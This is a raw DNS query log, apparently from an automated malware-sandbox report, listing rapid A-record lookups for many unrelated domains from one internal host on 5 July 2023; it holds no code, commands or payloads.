                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.829008102 CEST192.168.2.68.8.8.80x4cc9Standard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.830003023 CEST192.168.2.68.8.8.80x861eStandard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.834084034 CEST192.168.2.68.8.8.80xa689Standard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.837414980 CEST192.168.2.68.8.8.80x8f0Standard query (0)nels.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.850763083 CEST192.168.2.68.8.8.80xef70Standard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.947169065 CEST192.168.2.68.8.8.80x5933Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.959733009 CEST192.168.2.68.8.8.80xa375Standard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.959733009 CEST192.168.2.68.8.8.80xa0caStandard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.966296911 CEST192.168.2.68.8.8.80x2360Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.966912985 CEST192.168.2.68.8.8.80x5360Standard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.064255953 CEST192.168.2.68.8.8.80xb04eStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.075898886 CEST192.168.2.68.8.8.80x50b1Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.075898886 CEST192.168.2.68.8.8.80xea6fStandard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.085470915 CEST192.168.2.68.8.8.80xf5daStandard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.086860895 CEST192.168.2.68.8.8.80x76d6Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.116293907 CEST192.168.2.68.8.8.80x48c3Standard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.162398100 CEST192.168.2.68.8.8.80xef05Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.209222078 CEST192.168.2.68.8.8.80xf1d7Standard query (0)shteeble.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.212806940 CEST192.168.2.68.8.8.80xc3f0Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.214463949 CEST192.168.2.68.8.8.80xb41eStandard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.265687943 CEST192.168.2.68.8.8.80xc800Standard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.388860941 CEST192.168.2.68.8.8.80xa5deStandard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.394386053 CEST192.168.2.68.8.8.80xcb98Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.438111067 CEST192.168.2.68.8.8.80x5931Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.441390991 CEST192.168.2.68.8.8.80x7329Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.458380938 CEST192.168.2.68.8.8.80xbb73Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.480431080 CEST192.168.2.68.8.8.80x5794Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.486464024 CEST192.168.2.68.8.8.80xb9faStandard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.489352942 CEST192.168.2.68.8.8.80xd04bStandard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.620153904 CEST192.168.2.68.8.8.80x1d79Standard query (0)4locals.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.663561106 CEST192.168.2.68.8.8.80xf9e0Standard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.666800022 CEST192.168.2.68.8.8.80xd8c5Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.670860052 CEST192.168.2.68.8.8.80xf00dStandard query (0)78san.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.935161114 CEST192.168.2.68.8.8.80x5ca6Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.937597036 CEST192.168.2.68.8.8.80x2b74Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.937597990 CEST192.168.2.68.8.8.80x80f6Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.967813969 CEST192.168.2.68.8.8.80x9477Standard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.983871937 CEST192.168.2.68.8.8.80x9c79Standard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.225549936 CEST192.168.2.68.8.8.80x22d1Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.226767063 CEST192.168.2.68.8.8.80xea6fStandard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.280797958 CEST192.168.2.68.8.8.80x2a64Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.310930014 CEST192.168.2.68.8.8.80x779eStandard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.384886026 CEST192.168.2.68.8.8.80x7256Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.483388901 CEST192.168.2.68.8.8.80x1613Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.522130013 CEST192.168.2.68.8.8.80xe2eStandard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.536982059 CEST192.168.2.68.8.8.80x3adStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.539910078 CEST192.168.2.68.8.8.80x1ccaStandard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.542542934 CEST192.168.2.68.8.8.80x1a62Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.578728914 CEST192.168.2.68.8.8.80x7991Standard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.623085022 CEST192.168.2.68.8.8.80xdf41Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.623254061 CEST192.168.2.68.8.8.80x7b92Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.625061989 CEST192.168.2.68.8.8.80x3976Standard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.631206036 CEST192.168.2.68.8.8.80xa68eStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.707053900 CEST192.168.2.68.8.8.80x1675Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.712193966 CEST192.168.2.68.8.8.80xb3beStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.722429991 CEST192.168.2.68.8.8.80x9b0fStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.728506088 CEST192.168.2.68.8.8.80x6e72Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.735331059 CEST192.168.2.68.8.8.80x1f95Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.741897106 CEST192.168.2.68.8.8.80x8a3dStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.751707077 CEST192.168.2.68.8.8.80xfb1bStandard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.757261992 CEST192.168.2.68.8.8.80xfe82Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.763344049 CEST192.168.2.68.8.8.80xde1dStandard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.765954971 CEST192.168.2.68.8.8.80x1b6bStandard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.769846916 CEST192.168.2.68.8.8.80xf4caStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.781162977 CEST192.168.2.68.8.8.80x1d52Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.788126945 CEST192.168.2.68.8.8.80x471aStandard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.793742895 CEST192.168.2.68.8.8.80x8917Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.798779011 CEST192.168.2.68.8.8.80xd2b2Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.806091070 CEST192.168.2.68.8.8.80x7d27Standard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.811338902 CEST192.168.2.68.8.8.80xc70fStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.816979885 CEST192.168.2.68.8.8.80x882cStandard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.840702057 CEST192.168.2.68.8.8.80xd737Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.846824884 CEST192.168.2.68.8.8.80x7850Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.849641085 CEST192.168.2.68.8.8.80x4118Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.856463909 CEST192.168.2.68.8.8.80xda1dStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.896795034 CEST192.168.2.68.8.8.80x4d3cStandard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.949980021 CEST192.168.2.68.8.8.80x2b74Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.950392008 CEST192.168.2.68.8.8.80x5ca6Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.966243029 CEST192.168.2.68.8.8.80xf495Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.988281965 CEST192.168.2.68.8.8.80x16daStandard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.002629995 CEST192.168.2.68.8.8.80xca8eStandard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.052865982 CEST192.168.2.68.8.8.80x8dd4Standard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.054330111 CEST192.168.2.68.8.8.80x4944Standard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.096075058 CEST192.168.2.68.8.8.80x6b0bStandard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.191370964 CEST192.168.2.68.8.8.80x5157Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.191370964 CEST192.168.2.68.8.8.80x593bStandard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.214590073 CEST192.168.2.68.8.8.80x53c0Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.232665062 CEST192.168.2.68.8.8.80xfd0fStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.302018881 CEST192.168.2.68.8.8.80xdeacStandard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.308545113 CEST192.168.2.68.8.8.80x779eStandard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.396790028 CEST192.168.2.68.8.8.80x365eStandard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.471191883 CEST192.168.2.68.8.8.80x4611Standard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.496330023 CEST192.168.2.68.8.8.80x1613Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.560837030 CEST192.168.2.68.8.8.80xb767Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.598695993 CEST192.168.2.68.8.8.80xd061Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.676645994 CEST192.168.2.68.8.8.80xecc0Standard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.764501095 CEST192.168.2.68.8.8.80x2248Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.791348934 CEST192.168.2.68.8.8.80x115bStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.809334040 CEST192.168.2.68.8.8.80xc70fStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.824106932 CEST192.168.2.68.8.8.80x1673Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.870837927 CEST192.168.2.68.8.8.80x52b1Standard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.875112057 CEST192.168.2.68.8.8.80x7cb9Standard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.883721113 CEST192.168.2.68.8.8.80x570dStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.889666080 CEST192.168.2.68.8.8.80x7d4Standard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.890615940 CEST192.168.2.68.8.8.80x3773Standard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.892148018 CEST192.168.2.68.8.8.80x1696Standard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.926740885 CEST192.168.2.68.8.8.80xca4eStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.949229956 CEST192.168.2.68.8.8.80x2b74Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.954618931 CEST192.168.2.68.8.8.80x70d5Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.970807076 CEST192.168.2.68.8.8.80x7fe1Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.990600109 CEST192.168.2.68.8.8.80x7cfeStandard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.007711887 CEST192.168.2.68.8.8.80xb92Standard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.058150053 CEST192.168.2.68.8.8.80x691Standard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.059746981 CEST192.168.2.68.8.8.80xb1fcStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.079262018 CEST192.168.2.68.8.8.80xb23fStandard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.083488941 CEST192.168.2.68.8.8.80x24e0Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.106875896 CEST192.168.2.68.8.8.80xed1cStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.174844027 CEST192.168.2.68.8.8.80x38a7Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.188756943 CEST192.168.2.68.8.8.80xbdf4Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.199285030 CEST192.168.2.68.8.8.80x6084Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.225924015 CEST192.168.2.68.8.8.80xbc3bStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.237272978 CEST192.168.2.68.8.8.80x44ddStandard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.252300024 CEST192.168.2.68.8.8.80xe8Standard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.267720938 CEST192.168.2.68.8.8.80x1ecbStandard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.323601007 CEST192.168.2.68.8.8.80xf41Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.375940084 CEST192.168.2.68.8.8.80x5dcaStandard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.393349886 CEST192.168.2.68.8.8.80xb552Standard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.423986912 CEST192.168.2.68.8.8.80x89b6Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.493742943 CEST192.168.2.68.8.8.80x6ccStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.558516979 CEST192.168.2.68.8.8.80xb767Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.667946100 CEST192.168.2.68.8.8.80xecc0Standard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.738295078 CEST192.168.2.68.8.8.80x98ceStandard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.753680944 CEST192.168.2.68.8.8.80x9065Standard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.778397083 CEST192.168.2.68.8.8.80x9483Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.808937073 CEST192.168.2.68.8.8.80xb963Standard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.826010942 CEST192.168.2.68.8.8.80xc70fStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.892230034 CEST192.168.2.68.8.8.80xe6e6Standard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.935317993 CEST192.168.2.68.8.8.80x84d7Standard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.966325998 CEST192.168.2.68.8.8.80xc57eStandard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.985728025 CEST192.168.2.68.8.8.80x3e78Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.997399092 CEST192.168.2.68.8.8.80xc7edStandard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.016453028 CEST192.168.2.68.8.8.80x2b54Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.064675093 CEST192.168.2.68.8.8.80xca0cStandard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.076653957 CEST192.168.2.68.8.8.80x649fStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.091244936 CEST192.168.2.68.8.8.80xc464Standard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.091833115 CEST192.168.2.68.8.8.80xe1bdStandard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.106667042 CEST192.168.2.68.8.8.80xed1cStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.106930017 CEST192.168.2.68.8.8.80xa1d1Standard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.114171982 CEST192.168.2.68.8.8.80x2feStandard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.137727976 CEST192.168.2.68.8.8.80x4ee1Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.178198099 CEST192.168.2.68.8.8.80x32adStandard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.210222006 CEST192.168.2.68.8.8.80x2a13Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.241957903 CEST192.168.2.68.8.8.80x88b7Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.251013994 CEST192.168.2.68.8.8.80xfd43Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.277426004 CEST192.168.2.68.8.8.80x1ecbStandard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.329066038 CEST192.168.2.68.8.8.80x15d0Standard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.341156960 CEST192.168.2.68.8.8.80xf86aStandard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.392709017 CEST192.168.2.68.8.8.80x704Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.423497915 CEST192.168.2.68.8.8.80x4025Standard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.456759930 CEST192.168.2.68.8.8.80xf01aStandard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.466394901 CEST192.168.2.68.8.8.80x98f3Standard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.470521927 CEST192.168.2.68.8.8.80xea10Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.480607986 CEST192.168.2.68.8.8.80x6ccStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.517594099 CEST192.168.2.68.8.8.80x800cStandard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.574680090 CEST192.168.2.68.8.8.80xb767Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.706013918 CEST192.168.2.68.8.8.80xfa6eStandard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.753690004 CEST192.168.2.68.8.8.80xe04dStandard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.766058922 CEST192.168.2.68.8.8.80xbc7dStandard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.779048920 CEST192.168.2.68.8.8.80x3f4dStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.779655933 CEST192.168.2.68.8.8.80xd552Standard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.845212936 CEST192.168.2.68.8.8.80xcc31Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.845269918 CEST192.168.2.68.8.8.80xd609Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.876364946 CEST192.168.2.68.8.8.80x4751Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.931181908 CEST192.168.2.68.8.8.80xc7f3Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.949661016 CEST192.168.2.68.8.8.80x84d7Standard query (0)ludomemo.comA (IP address)IN (0x0001)false
